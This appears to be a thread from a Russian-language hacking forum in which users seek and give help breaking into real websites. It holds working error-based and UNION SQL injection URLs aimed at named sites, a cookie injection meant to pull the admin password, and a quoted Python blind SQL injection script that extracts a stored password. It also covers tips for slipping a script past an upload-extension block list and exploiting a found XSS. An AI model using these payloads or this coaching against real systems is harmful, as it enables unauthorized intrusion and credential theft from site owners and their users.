сам не смог ничего сделать, пробовалв sqlhelper'e он тоже ничего не сделал кроме того что определил что это sql union inj И у меня есть пару вопросов есть сайт, просканил директории нашол файл .bash_history открыл его там такое: Code: crontab -e svs@a18-swforum ~ $ crontab -e crontabs/svs: Permission denied ls -la ps aux ps aux ps aux ps aux ps aux crontab -e man crontab exit что это? И если на сайте отображается код JS ну например открываю ссылку site.com/pngfix.js оно мне выдает код скрипта, это нормально? и последнее: перебираю страницы на сайте и наткнулся на такое: http://site.com/?id=7 страница выдала Code: can't select db: Could not locate entry in sysdatabases for database 'название базы'. No entry found with that name. Make sure that the name is entered correctly. сканил сайт сканером WVS он выдал что здесь http://forum.shock-world.com/journal.php?"onmouseover=prompt(987671)> XSS но я в них мало шарю, что с нее выжать можно? вобщем есть за что хвататься?
http://www.liftnn.ru/page.php?path=0.25 там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+from+pages+limit+0,1),floor(rand(0)*2))having+min(0)+or+1%23 работает http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос бруть таблицы либо ищи способ обойтись без точки
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
SQL injection полный FAQ [Dr.Z3r0] SQL инъекция (в т.ч. и blind SQL) [kot777] Быстрый Blind SQL Injection [Qwazar] А поиск для чего??
есть уязвимый сервер, могу заливать все типы файлов кроме: $Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg') ; пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются сервер под nginx, поэтому htaccess не пойдет lfi не нашел что можно еще поробовать?
кусок уязвимого кода структура таблицы чему должна быть равна переменная $lole для вывода password where username admin?
Должно быть mq = off; Попробуй Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1 Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
inurl:advertisewmz.php уязвимый сценарий referals.php, он в той же папке спасибо за ответ, попробую завтра принтабельные цифры будут 2,9?
какето? http://uzmob.uz/profile.php?mode=viewprofile&u=692' Could not update user data. DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3 UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id = Line : 27 File : usercp_viewprofile.php
Не могу запустить сплойт. Code: #!/usr/bin/python #-*- coding: utf-8 -*- # coded by BlueH4G _http://blueh4g.org_ import urllib,re from time import sleep def main() : chk = re.compile("true_title") url_begin=" http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20(" url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20asc%20limit%200,1%23" result="result : " for spos in range(1,14): ch=0 for i in range(1,8) : sleep(0.05) query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1 data=urllib.urlopen(url_begin + query + url_end) text=data.read() if chk.search(text) : ch += 2**(7-i) result+=chr(ch) print result main() C:\Python27>root.py File "C:\Python27\root.py", line 9 url_begin=" ^ SyntaxError: EOL while scanning string literal
привет, дружище) расскажи в общих словах почему ты даже не удосужился поискать в поисковой системе google по коду ошибки? На твой взгляд что значит аббревиатура EOL?
Как это раскрутить http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
Error Based же: http://www.onradio.gr/play_old.php?id=245%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%20-